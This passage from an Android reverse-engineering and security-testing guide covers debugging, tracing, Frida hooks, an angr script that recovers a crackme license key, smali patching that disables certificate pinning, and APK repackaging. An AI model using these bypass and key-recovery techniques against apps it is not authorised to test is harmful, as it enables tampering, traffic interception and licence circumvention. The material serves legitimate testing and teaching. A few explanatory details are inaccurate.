adb push $NDK/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp\n
The gdbserver --attach
command causes gdbserver to attach to the running process and bind to the IP address and port specified in comm
, which in this case is a HOST:PORT descriptor. Start HelloWorldJNI on the device, then connect to the device and determine the PID of the HelloWorldJNI process (sg.vantagepoint.helloworldjni). Then switch to the root user and attach gdbserver
:
$ adb shell\n$ ps | grep helloworld\nu0_a164 12690 201 1533400 51692 ffffffff 00000000 S sg.vantagepoint.helloworldjni\n$ su\n# /data/local/tmp/gdbserver --attach localhost:1234 12690\nAttached; pid = 12690\nListening on port 1234\n
The process is now suspended, and gdbserver
is listening for debugging clients on port 1234
. With the device connected via USB, you can forward this port to a local port on the host with the abd forward
command:
adb forward tcp:1234 tcp:1234\n
You'll now use the prebuilt version of gdb
included in the NDK toolchain.
$ $TOOLCHAIN/bin/gdb libnative-lib.so\nGNU gdb (GDB) 7.11\n(...)\nReading symbols from libnative-lib.so...(no debugging symbols found)...done.\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6e0f124 in ?? ()\n
You have successfully attached to the process! The only problem is that you're already too late to debug the JNI function StringFromJNI
; it only runs once, at startup. You can solve this problem by activating the \"Wait for Debugger\" option. Go to Developer Options -> Select debug app and pick HelloWorldJNI, then activate the Wait for debugger switch. Then terminate and re-launch the app. It should be suspended automatically.
Our objective is to set a breakpoint at the first instruction of the native function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
before resuming the app. Unfortunately, this isn't possible at this point in the execution because libnative-lib.so
isn't yet mapped into process memory, it's loaded dynamically during runtime. To get this working, you'll first use jdb to gently change the process into the desired state.
First, resume execution of the Java VM by attaching jdb. You don't want the process to resume immediately though, so pipe the suspend
command into jdb:
$ adb jdwp\n14342\n$ adb forward tcp:7777 jdwp:14342\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\n
Next, suspend the process where the Java runtime loads libnative-lib.so
. In jdb, set a breakpoint at the java.lang.System.loadLibrary
method and resume the process. After the breakpoint has been reached, execute the step up
command, which will resume the process until loadLibrary
returns. At this point, libnative-lib.so
has been loaded.
> stop in java.lang.System.loadLibrary\n> resume\nAll threads resumed.\nBreakpoint hit: \"thread=main\", java.lang.System.loadLibrary(), line=988 bci=0\n> step up\nmain[1] step up\n>\nStep completed: \"thread=main\", sg.vantagepoint.helloworldjni.MainActivity.<clinit>(), line=12 bci=5\n\nmain[1]\n
Execute gdbserver
to attach to the suspended app. This will cause the app to be suspended by both the Java VM and the Linux kernel (creating a state of \"double-suspension\").
$ adb forward tcp:1234 tcp:1234\n$ $TOOLCHAIN/arm-linux-androideabi-gdb libnative-lib.so\nGNU gdb (GDB) 7.7\nCopyright (C) 2014 Free Software Foundation, Inc.\n(...)\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6de83b8 in ?? ()\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/","title":"Execution Tracing","text":"Besides being useful for debugging, the jdb command line tool offers basic execution tracing functionality. To trace an app right from the start, you can pause the app with the Android \"Wait for Debugger\" feature or a kill -STOP
command and attach jdb to set a deferred method breakpoint on any initialization method. Once the breakpoint is reached, activate method tracing with the trace go methods
command and resume execution. jdb will dump all method entries and exits from that point onwards.
$ adb forward tcp:7777 jdwp:7288\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nSet uncaught java.lang.Throwable\nSet deferred uncaught java.lang.Throwable\nInitializing jdb ...\n> All threads suspended.\n> stop in com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\nDeferring breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>().\nIt will be set after the class is loaded.\n> resume\nAll threads resumed.M\nSet deferred breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\n\nBreakpoint hit: \"thread=main\", com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>(), line=44 bci=0\nmain[1] trace go methods\nmain[1] resume\nMethod entered: All threads resumed.\n
The Dalvik Debug Monitor Server (DDMS) is a GUI tool included with Android Studio. It may not look like much, but its Java method tracer is one of the most awesome tools you can have in your arsenal, and it is indispensable for analyzing obfuscated bytecode.
DDMS is somewhat confusing, however; it can be launched several ways, and different trace viewers will be launched depending on how a method was traced. There's a standalone tool called \"Traceview\" as well as a built-in viewer in Android Studio, both of which offer different ways to navigate the trace. You'll usually use Android studio's built-in viewer, which gives you a zoomable hierarchical timeline of all method calls. However, the standalone tool is also useful, it has a profile panel that shows the time spent in each method along with the parents and children of each method.
To record an execution trace in Android Studio, open the Android tab at the bottom of the GUI. Select the target process in the list and click the little stop watch button on the left. This starts the recording. Once you're done, click the same button to stop the recording. The integrated trace view will open and show the recorded trace. You can scroll and zoom the timeline view with the mouse or trackpad.
Execution traces can also be recorded in the standalone Android Device Monitor. The Device Monitor can be started within Android Studio (Tools -> Android -> Android Device Monitor) or from the shell with the ddms
command.
To start recording tracing information, select the target process in the Devices tab and click Start Method Profiling. Click the stop button to stop recording, after which the Traceview tool will open and show the recorded trace. Clicking any of the methods in the profile panel highlights the selected method in the timeline panel.
DDMS also offers a convenient heap dump button that will dump the Java heap of a process to a .hprof file. The Android Studio user guide contains more information about Traceview.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#tracing-system-calls","title":"Tracing System Calls","text":"Moving down a level in the OS hierarchy, you arrive at privileged functions that require the powers of the Linux kernel. These functions are available to normal processes via the system call interface. Instrumenting and intercepting calls into the kernel is an effective method for getting a rough idea of what a user process is doing, and often the most efficient way to deactivate low-level tampering defenses.
Strace is a standard Linux utility that is not included with Android by default, but can be easily built from source via the Android NDK. It monitors the interaction between processes and the kernel, being a very convenient way to monitor system calls. However, there's a downside: as strace depends on the ptrace
system call to attach to the target process, once anti-debugging measures become active it will stop working.
If the \"Wait for debugger\" feature in Settings > Developer options is unavailable, you can use a shell script to launch the process and immediately attach strace (not an elegant solution, but it works):
while true; do pid=$(pgrep 'target_process' | head -1); if [[ -n \"$pid\" ]]; then strace -s 2000 - e \"!read\" -ff -p \"$pid\"; break; fi; done\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#ftrace","title":"Ftrace","text":"Ftrace is a tracing utility built directly into the Linux kernel. On a rooted device, ftrace can trace kernel system calls more transparently than strace can (strace relies on the ptrace system call to attach to the target process).
Conveniently, the stock Android kernel on both Lollipop and Marshmallow include ftrace functionality. The feature can be enabled with the following command:
echo 1 > /proc/sys/kernel/ftrace_enabled\n
The /sys/kernel/debug/tracing
directory holds all control and output files related to ftrace. The following files are found in this directory:
The KProbes interface provides an even more powerful way to instrument the kernel: it allows you to insert probes into (almost) arbitrary code addresses within kernel memory. KProbes inserts a breakpoint instruction at the specified address. Once the breakpoint is reached, control passes to the KProbes system, which then executes the user-defined handler function(s) and the original instruction. Besides being great for function tracing, KProbes can implement rootkit-like functionality, such as file hiding.
Jprobes and Kretprobes are other KProbes-based probe types that allow hooking of function entries and exits.
The stock Android kernel comes without loadable module support, which is a problem because Kprobes are usually deployed as kernel modules. The strict memory protection the Android kernel is compiled with is another issue because it prevents the patching of some parts of Kernel memory. Elfmaster's system call hooking method causes a Kernel panic on stock Lollipop and Marshmallow because the sys_call_table is non-writable. You can, however, use KProbes in a sandbox by compiling your own, more lenient Kernel (more on this later).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0033/","title":"Method Tracing","text":"In contrast to method profiling, which tells you how frequently a method is being called, method tracing helps you to also determine its input and output values. This technique can prove to be very useful when dealing with applications that have a big codebase and/or are obfuscated.
If you prefer a GUI-based approach you can use tools such as RMS - Runtime Mobile Security which enables a more visual experience as well as include several convenience tracing options.
If you prefer the command line, Frida offers a useful syntax to query Java classes and methods as well as Java method tracing support for frida-trace via -j
(starting on frida-tools 8.0, Frida 12.10).
Java.enumerateMethods('*youtube*!on*')
uses globs to take all classes that include \"youtube\" as part of their name and enumerate all methods starting with \"on\".-j '*!*certificate*/isu'
triggers a case-insensitive query (i
), including method signatures (s
) and excluding system classes (u
).Refer to the Release Notes for Frida 12.10 for more details on this new feature. To learn more about all options for advanced usage, check the documentation on the official Frida website.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0034/","title":"Native Code Tracing","text":"Native methods tracing can be performed with relative ease compared to Java method tracing. frida-trace
is a CLI tool for dynamically tracing function calls. It makes tracing native functions trivial and can be very useful for collecting information about an application.
In order to use frida-trace
, a Frida server should be running on the device. An example for tracing libc's open
function using frida-trace
is demonstrated below, where -U
connects to the USB device and -i
specifies the function to be included in the trace.
frida-trace -U -i \"open\" com.android.chrome\n
Note how, by default, only the arguments passed to the function are shown, but not the return values. Under the hood, frida-trace
generates one little JavaScript handler file per matched function in the auto-generated __handlers__
folder, which Frida then injects into the process. You can edit these files for more advanced usage such as obtaining the return value of the functions, their input parameters, accessing the memory, etc. Check Frida's JavaScript API for more details.
In this case, the generated script which traces all calls to the open
function in libc.so
is located in __handlers__/libc.so/open.js
, it looks as follows:
{\n onEnter: function (log, args, state) {\n log('open(' +\n 'path=\"' + args[0].readUtf8String() + '\"' +\n ', oflag=' + args[1] +\n ')');\n },\n\n\n onLeave: function (log, retval, state) {\n log('\\t return: ' + retval); \\\\ edited\n }\n}\n
In the above script, onEnter
takes care of logging the calls to this function and its two input parameters in the right format. You can edit the onLeave
event to print the return values as shown above.
Note that libc is a well-known library, Frida is able to derive the input parameters of its open
function and automatically log them correctly. But this won't be the case for other libraries or for Android Kotlin/Java code. In that case, you may want to obtain the signatures of the functions you're interested in by referring to Android Developers documentation or by reverse engineer the app first.
Another thing to notice in the output above is that it's colorized. An application can have multiple threads running, and each thread can call the open
function independently. By using such a color scheme, the output can be easily visually segregated for each thread.
frida-trace
is a very versatile tool and there are multiple configuration options available such as:
-I
and excluding -X
entire modules.-i \"Java_*\"
(note the use of a glob *
to match all possible functions starting with \"Java_\").-a \"libjpeg.so!0x4793c\"
.frida-trace -U -i \"Java_*\" com.android.chrome\n
Many binaries are stripped and don't have function name symbols available with them. In such cases, a function can be traced using its address as well.
frida-trace -p 1372 -a \"libjpeg.so!0x4793c\"\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0035/","title":"JNI Tracing","text":"As detailed in section Reviewing Disassembled Native Code, the first argument passed to every JNI function is a JNI interface pointer. This pointer contains a table of functions that allows native code to access the Android Runtime. Identifying calls to these functions can help with understanding library functionality, such as what strings are created or Java methods are called.
jnitrace is a Frida based tool similar to frida-trace which specifically targets the usage of Android's JNI API by native libraries, providing a convenient way to obtain JNI method traces including arguments and return values.
You can easily install it by running pip install jnitrace
and run it straight away as follows:
jnitrace -l libnative-lib.so sg.vantagepoint.helloworldjni\n
The -l
option can be provided multiple times to trace multiple libraries, or *
can be provided to trace all libraries. This, however, may provide a lot of output.
In the output you can see the trace of a call to NewStringUTF
made from the native code (its return value is then given back to Java code, see section \"Reviewing Disassembled Native Code\" for more details). Note how similarly to frida-trace, the output is colorized helping to visually distinguish the different threads.
When tracing JNI API calls you can see the thread ID at the top, followed by the JNI method call including the method name, the input arguments and the return value. In the case of a call to a Java method from native code, the Java method arguments will also be supplied. Finally jnitrace will attempt to use the Frida backtracing library to show where the JNI call was made from.
To learn more about all options for advanced usage, check the documentation on the jnitrace GitHub page.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0036/","title":"Emulation-based Analysis","text":"The Android emulator is based on QEMU, a generic and open source machine emulator. QEMU emulates a guest CPU by translating the guest instructions on-the-fly into instructions the host processor can understand. Each basic block of guest instructions is disassembled and translated into an intermediate representation called Tiny Code Generator (TCG). The TCG block is compiled into a block of host instructions, stored in a code cache, and executed. After execution of the basic block, QEMU repeats the process for the next block of guest instructions (or loads the already translated block from the cache). The whole process is called dynamic binary translation.
Because the Android emulator is a fork of QEMU, it comes with all QEMU features, including monitoring, debugging, and tracing facilities. QEMU-specific parameters can be passed to the emulator with the -qemu
command line flag. You can use QEMU's built-in tracing facilities to log executed instructions and virtual register values. Starting QEMU with the -d
command line flag will cause it to dump the blocks of guest code, micro operations, or host instructions being executed. With the -d_asm
flag, QEMU logs all basic blocks of guest code as they enter QEMU's translation function. The following command logs all translated blocks to a file:
emulator -show-kernel -avd Nexus_4_API_19 -snapshot default-boot -no-snapshot-save -qemu -d in_asm,cpu 2>/tmp/qemu.log\n
Unfortunately, generating a complete guest instruction trace with QEMU is impossible because code blocks are written to the log only at the time they are translated, not when they're taken from the cache. For example, if a block is repeatedly executed in a loop, only the first iteration will be printed to the log. There's no way to disable TB caching in QEMU (besides hacking the source code). Nevertheless, the functionality is sufficient for basic tasks, such as reconstructing the disassembly of a natively executed cryptographic algorithm.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0037/","title":"Symbolic Execution","text":"Symbolic execution is a very useful technique to have in your toolbox, especially while dealing with problems where you need to find a correct input for reaching a certain block of code. In this section, we will solve a simple Android crackme by using the Angr binary analysis framework as our symbolic execution engine.
To demonstrate this technique we'll use a crackme called Android License Validator. The crackme consists of a single ELF executable file, which can be executed on any Android device by following the instructions below:
$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n\n$ adb shell chmod 755 /data/local/tmp/validate\n\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n\n$ adb shell /data/local/tmp/validate 12345\nIncorrect serial (wrong format).\n
So far so good, but we know nothing about what a valid license key looks like. To get started, open the ELF executable in a disassembler such as iaito. The main function is located at offset 0x00001874
in the disassembly. It is important to note that this binary is PIE-enabled, and iaito chooses to load the binary at 0x0
as image base address.
The function names have been stripped from the binary, but luckily there are enough debugging strings to provide us a context to the code. Moving forward, we will start analyzing the binary from the entry function at offset 0x00001874
, and keep a note of all the information easily available to us. During this analysis, we will also try to identify the code regions which are suitable for symbolic execution.
strlen
is called at offset 0x000018a8
, and the returned value is compared to 0x10 at offset 0x000018b0
. Immediately after that, the input string is passed to a Base32 decoding function at offset 0x00001340
. This provides us with valuable information that the input license key is a Base32-encoded 16-character string (which totals 10 bytes in raw). The decoded input is then passed to the function at offset 0x00001760
, which validates the license key. The disassembly of this function is shown below.
We can now use this information about the expected input to further look into the validation function at 0x00001760
.
\u256d (fcn) fcn.00001760 268\n\u2502 fcn.00001760 (int32_t arg1);\n\u2502 ; var int32_t var_20h @ fp-0x20\n\u2502 ; var int32_t var_14h @ fp-0x14\n\u2502 ; var int32_t var_10h @ fp-0x10\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 ; CALL XREF from fcn.00001760 (+0x1c4)\n\u2502 0x00001760 push {r4, fp, lr}\n\u2502 0x00001764 add fp, sp, 8\n\u2502 0x00001768 sub sp, sp, 0x1c\n\u2502 0x0000176c str r0, [var_20h] ; 0x20 ; \"$!\" ; arg1\n\u2502 0x00001770 ldr r3, [var_20h] ; 0x20 ; \"$!\" ; entry.preinit0\n\u2502 0x00001774 str r3, [var_10h] ; str.\n\u2502 ; 0x10\n\u2502 0x00001778 mov r3, 0\n\u2502 0x0000177c str r3, [var_14h] ; 0x14\n\u2502 \u256d\u2500< 0x00001780 b 0x17d0\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x17d8)\n\u2502 \u256d\u2500\u2500> 0x00001784 ldr r3, [var_10h] ; str.\n\u2502 \u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001788 ldrb r2, [r3]\n\u2502 \u254e\u2502 0x0000178c ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001790 add r3, r3, 1\n\u2502 \u254e\u2502 0x00001794 ldrb r3, [r3]\n\u2502 \u254e\u2502 0x00001798 eor r3, r2, r3\n\u2502 \u254e\u2502 0x0000179c and r2, r3, 0xff\n\u2502 \u254e\u2502 0x000017a0 mvn r3, 0xf\n\u2502 \u254e\u2502 0x000017a4 ldr r1, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017a8 sub r0, fp, 0xc\n\u2502 \u254e\u2502 0x000017ac add r1, r0, r1\n\u2502 \u254e\u2502 0x000017b0 add r3, r1, r3\n\u2502 \u254e\u2502 0x000017b4 strb r2, [r3]\n\u2502 \u254e\u2502 0x000017b8 ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017bc add r3, r3, 2 ; \"ELF\\x01\\x01\\x01\" ; aav.0x00000001\n\u2502 \u254e\u2502 0x000017c0 str r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10\n\u2502 \u254e\u2502 0x000017c4 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017c8 add r3, r3, 1\n\u2502 \u254e\u2502 0x000017cc str r3, [var_14h] ; 0x14\n\u2502 \u254e\u2502 ; CODE XREF from fcn.00001760 (0x1780)\n\u2502 \u254e\u2570\u2500> 0x000017d0 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e 0x000017d4 cmp r3, 4 ; aav.0x00000004 ; aav.0x00000001 ; aav.0x00000001\n\u2502 \u2570\u2500\u2500< 0x000017d8 ble 0x1784 ; likely\n\u2502 0x000017dc ldrb r4, [fp, -0x1c] ; \"4\"\n\u2502 0x000017e0 bl fcn.000016f0\n\u2502 0x000017e4 mov r3, r0\n\u2502 0x000017e8 cmp r4, r3\n\u2502 \u256d\u2500< 0x000017ec bne 0x1854 ; likely\n\u2502 \u2502 0x000017f0 ldrb r4, [fp, -0x1b]\n\u2502 \u2502 0x000017f4 bl fcn.0000170c\n\u2502 \u2502 0x000017f8 mov r3, r0\n\u2502 \u2502 0x000017fc cmp r4, r3\n\u2502 \u256d\u2500\u2500< 0x00001800 bne 0x1854 ; likely\n\u2502 \u2502\u2502 0x00001804 ldrb r4, [fp, -0x1a]\n\u2502 \u2502\u2502 0x00001808 bl fcn.000016f0\n\u2502 \u2502\u2502 0x0000180c mov r3, r0\n\u2502 \u2502\u2502 0x00001810 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500< 0x00001814 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502 0x00001818 ldrb r4, [fp, -0x19]\n\u2502 \u2502\u2502\u2502 0x0000181c bl fcn.00001728\n\u2502 \u2502\u2502\u2502 0x00001820 mov r3, r0\n\u2502 \u2502\u2502\u2502 0x00001824 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500< 0x00001828 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502 0x0000182c ldrb r4, [fp, -0x18]\n\u2502 \u2502\u2502\u2502\u2502 0x00001830 bl fcn.00001744\n\u2502 \u2502\u2502\u2502\u2502 0x00001834 mov r3, r0\n\u2502 \u2502\u2502\u2502\u2502 0x00001838 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500< 0x0000183c bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001840 ldr r3, [0x0000186c] ; [0x186c:4]=0x270 section..hash ; section..hash\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001844 add r3, pc, r3 ; 0x1abc ; \"Product activation passed. Congratulations!\"\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001848 mov r0, r3 ; 0x1abc ; \"Product activation passed. Congratulations!\" ;\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x0000184c bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502\u2502\u2502\u2502\u2502 ; int puts(\"Product activation passed. Congratulations!\")\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500\u2500< 0x00001850 b 0x1864\n\u2502 \u2502\u2502\u2502\u2502\u2502\u2502 ; CODE XREFS from fcn.00001760 (0x17ec, 0x1800, 0x1814, 0x1828, 0x183c)\n\u2502 \u2502\u2570\u2570\u2570\u2570\u2570\u2500> 0x00001854 ldr r3, aav.0x00000288 ; [0x1870:4]=0x288 aav.0x00000288\n\u2502 \u2502 0x00001858 add r3, pc, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x0000185c mov r0, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x00001860 bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502 ; int puts(\"Incorrect serial.\")\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x1850)\n\u2502 \u2570\u2500\u2500\u2500\u2500\u2500\u2500> 0x00001864 sub sp, fp, 8\n\u2570 0x00001868 pop {r4, fp, pc} ; entry.preinit0 ; entry.preinit0 ;\n
Discussing all the instructions in the function is beyond the scope of this chapter, instead we will discuss only the important points needed for the analysis. In the validation function, there is a loop present at 0x00001784
which performs a XOR operation at offset 0x00001798
. The loop is more clearly visible in the graph view below.
XOR is a very commonly used technique to encrypt information where obfuscation is the goal rather than security. XOR should not be used for any serious encryption, as it can be cracked using frequency analysis. Therefore, the mere presence of XOR encryption in such a validation logic always requires special attention and analysis.
Moving forward, at offset 0x000017dc
, the XOR decoded value obtained from above is being compared against the return value from a sub-function call at 0x000017e8
.
Clearly this function is not complex, and can be analyzed manually, but still remains a cumbersome task. Especially while working on a big code base, time can be a major constraint, and it is desirable to automate such analysis. Dynamic symbolic execution is helpful in exactly those situations. In the above crackme, the symbolic execution engine can determine the constraints on each byte of the input string by mapping a path between the first instruction of the license check (at 0x00001760
) and the code that prints the \"Product activation passed\" message (at 0x00001840
).
The constraints obtained from the above steps are passed to a solver engine, which finds an input that satisfies them - a valid license key.
You need to perform several steps to initialize Angr's symbolic execution engine:
Load the binary into a Project
, which is the starting point for any kind of analysis in Angr.
Pass the address from which the analysis should start. In this case, we will initialize the state with the first instruction of the serial validation function. This makes the problem significantly easier to solve because you avoid symbolically executing the Base32 implementation.
Pass the address of the code block that the analysis should reach. In this case, that's the offset 0x00001840
, where the code responsible for printing the \"Product activation passed\" message is located.
Also, specify the addresses that the analysis should not reach. In this case, the code block that prints the \"Incorrect serial\" message at 0x00001854
is not interesting.
Note that the Angr loader will load the PIE executable with a base address of 0x400000
, which needs to be added to the offsets from iaito before passing it to Angr.
The final solution script is presented below:
import angr # Version: 9.2.2\nimport base64\n\nload_options = {}\n\nb = angr.Project(\"./validate\", load_options = load_options)\n# The key validation function starts at 0x401760, so that's where we create the initial state.\n# This speeds things up a lot because we're bypassing the Base32-encoder.\n\noptions = {\n angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,\n angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS,\n}\n\nstate = b.factory.blank_state(addr=0x401760, add_options=options)\n\nsimgr = b.factory.simulation_manager(state)\nsimgr.explore(find=0x401840, avoid=0x401854)\n\n# 0x401840 = Product activation passed\n# 0x401854 = Incorrect serial\nfound = simgr.found[0]\n\n# Get the solution string from *(R11 - 0x20).\n\naddr = found.memory.load(found.regs.r11 - 0x20, 1, endness=\"Iend_LE\")\nconcrete_addr = found.solver.eval(addr)\nsolution = found.solver.eval(found.memory.load(concrete_addr,10), cast_to=bytes)\nprint(base64.b32encode(solution))\n
As discussed previously in the section \"Dynamic Binary Instrumentation\", the symbolic execution engine constructs a binary tree of the operations for the program input given and generates a mathematical equation for each possible path that might be taken. Internally, Angr explores all the paths between the two points specified by us, and passes the corresponding mathematical equations to the solver to return meaningful concrete results. We can access these solutions via simulation_manager.found
list, which contains all the possible paths explored by Angr which satisfies our specified search criteria.
Take a closer look at the latter part of the script where the final solution string is being retrieved. The address of the string is obtained from address r11 - 0x20
. This may appear magical at first, but a careful analysis of the function at 0x00001760
holds the clue, as it determines if the given input string is a valid license key or not. In the disassembly above, you can see how the input string to the function (in register R0) is stored into a local stack variable 0x0000176c str r0, [var_20h]
. Hence, we decided to use this value to retrieve the final solution in the script. Using found.solver.eval
you can ask the solver questions like \"given the output of this sequence of operations (the current state in found
), what must the input (at addr
) have been?\".
In ARMv7, R11 is called fp (function pointer), therefore R11 - 0x20
is equivalent to fp-0x20
: var int32_t var_20h @ fp-0x20
Next, the endness
parameter in the script specifies that the data is stored in \"little-endian\" fashion, which is the case for almost all of the Android devices.
Also, it may appear as if the script is simply reading the solution string from the memory of the script. However, it's reading it from the symbolic memory. Neither the string nor the pointer to the string actually exist. The solver ensures that the solution it provides is the same as if the program would be executed to that point.
Running this script should return the following output:
$ python3 solve.py\nWARNING | ... | cle.loader | The main binary is a position-independent executable. It is being loaded with a base address of 0x400000.\n\nb'JACE6ACIARNAAIIA'\n
Now you can run the validate binary in your Android device to verify the solution as indicated here.
You may obtain different solutions using the script, as there are multiple valid license keys possible.
To conclude, learning symbolic execution might look a bit intimidating at first, as it requires deep understanding and extensive practice. However, the effort is justified considering the valuable time it can save in contrast to analyzing complex disassembled instructions manually. Typically you'd use hybrid techniques, as in the above example, where we performed manual analysis of the disassembled code to provide the correct criteria to the symbolic execution engine. Please refer to the iOS chapter for more examples on Angr usage.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/","title":"Patching","text":"Making small changes to the Android Manifest or bytecode is often the quickest way to fix small annoyances that prevent you from testing or reverse engineering an app. On Android, two issues in particular happen regularly:
android:debuggable
flag is not set to \"true\"
in the Android Manifest.In most cases, both issues can be fixed by making minor changes to the app (aka. patching) and then re-signing and repackaging it. Apps that run additional integrity checks beyond default Android code-signing are an exception. In those cases, you have to patch the additional checks as well.
The first step is unpacking and disassembling the APK with apktool
:
apktool d target_apk.apk\n
Note: To save time, you may use the flag --no-src
if you only want to unpack the APK but not disassemble the code. For example, when you only want to modify the Android Manifest and repack immediately.
Certificate pinning is an issue for security testers who want to intercept HTTPS communication for legitimate reasons. Patching bytecode to deactivate SSL pinning can help with this. To demonstrate bypassing certificate pinning, we'll walk through an implementation in an example application.
Once you've unpacked and disassembled the APK, it's time to find the certificate pinning checks in the Smali source code. Searching the code for keywords such as \"X509TrustManager\" should point you in the right direction.
In our example, a search for \"X509TrustManager\" returns one class that implements a custom TrustManager. The derived class implements the methods checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
.
To bypass the pinning check, add the return-void
opcode to the first line of each method. This opcode causes the checks to return immediately. With this modification, no certificate checks are performed, and the application accepts all certificates.
.method public checkServerTrusted([LJava/security/cert/X509Certificate;Ljava/lang/String;)V\n .locals 3\n .param p1, \"chain\" # [Ljava/security/cert/X509Certificate;\n .param p2, \"authType\" # Ljava/lang/String;\n\n .prologue\n return-void # <-- OUR INSERTED OPCODE!\n .line 102\n iget-object v1, p0, Lasdf/t$a;->a:Ljava/util/ArrayList;\n\n invoke-virtual {v1}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;\n\n move-result-object v1\n\n :goto_0\n invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z\n
This modification will break the APK signature, so you'll also have to re-sign the altered APK archive after repackaging it.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"Every debugger-enabled process runs an extra thread for handling JDWP protocol packets. This thread is started only for apps that have the android:debuggable=\"true\"
flag set in their manifest file's <application>
element. This is the typical configuration of Android devices shipped to end users.
When reverse engineering apps, you'll often have access to the target app's release build only. Release builds aren't meant to be debugged, that's the purpose of debug builds. If the system property ro.debuggable
is set to \"0\", Android disallows both JDWP and native debugging of release builds. Although this is easy to bypass, you're still likely to encounter limitations, such as a lack of line breakpoints. Nevertheless, even an imperfect debugger is still an invaluable tool, being able to inspect the runtime state of a program makes understanding the program a lot easier.
To convert a release build into a debuggable build, you need to modify a flag in the Android Manifest file (AndroidManifest.xml). Once you've unpacked the app (e.g. apktool d --no-src UnCrackable-Level1.apk
) and decoded the Android Manifest, add android:debuggable=\"true\"
to it using a text editor:
<application android:allowBackup=\"true\" android:debuggable=\"true\" android:icon=\"@drawable/ic_launcher\" android:label=\"@string/app_name\" android:name=\"com.xxx.xxx.xxx\" android:theme=\"@style/AppTheme\">\n
Even if we haven't altered the source code, this modification also breaks the APK signature, so you'll also have to re-sign the altered APK archive.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-react-native-applications","title":"Patching React Native applications","text":"If the React Native framework has been used for developing then the main application code is located in the file assets/index.android.bundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. By using the tool JStillery a human readable version of the file can be retrieved, allowing code analysis. The CLI version of JStillery or the local server should be preferred instead of using the online version as otherwise source code is sent and disclosed to a 3rd party.
The following approach can be used in order to patch the JavaScript file:
apktool
tool.assets/index.android.bundle
into a temporary file.JStillery
to beautify and deobfuscate the content of the temporary file.assets/index.android.bundle
file.apktool
tool and sign it before installing it on the target device/emulator.You can easily repackage an app by doing the following:
cd UnCrackable-Level1\napktool b\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Note that the Android Studio build tools directory must be in the path. It is located at [SDK-Path]/build-tools/[version]
. The zipalign
and apksigner
tools are in this directory.
Before re-signing, you first need a code-signing certificate. If you have built a project in Android Studio before, the IDE has already created a debug keystore and certificate in $HOME/.android/debug.keystore
. The default password for this KeyStore is \"android\" and the key is called \"androiddebugkey\".
The standard Java distribution includes keytool
for managing KeyStores and certificates. You can create your own signing certificate and key, then add it to the debug KeyStore:
keytool -genkey -v -keystore ~/.android/debug.keystore -alias signkey -keyalg RSA -keysize 2048 -validity 20000\n
After the certificate is available, you can re-sign the APK with it. Be sure that apksigner
is in the path and that you run it from the folder where your repackaged APK is located.
apksigner sign --ks ~/.android/debug.keystore --ks-key-alias signkey UnCrackable-Repackaged.apk\n
Note: If you experience JRE compatibility issues with apksigner
, you can use jarsigner
instead. When you do this, zipalign
must be called after signing.
jarsigner -verbose -keystore ~/.android/debug.keystore ../UnCrackable-Repackaged.apk signkey\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Now you may reinstall the app:
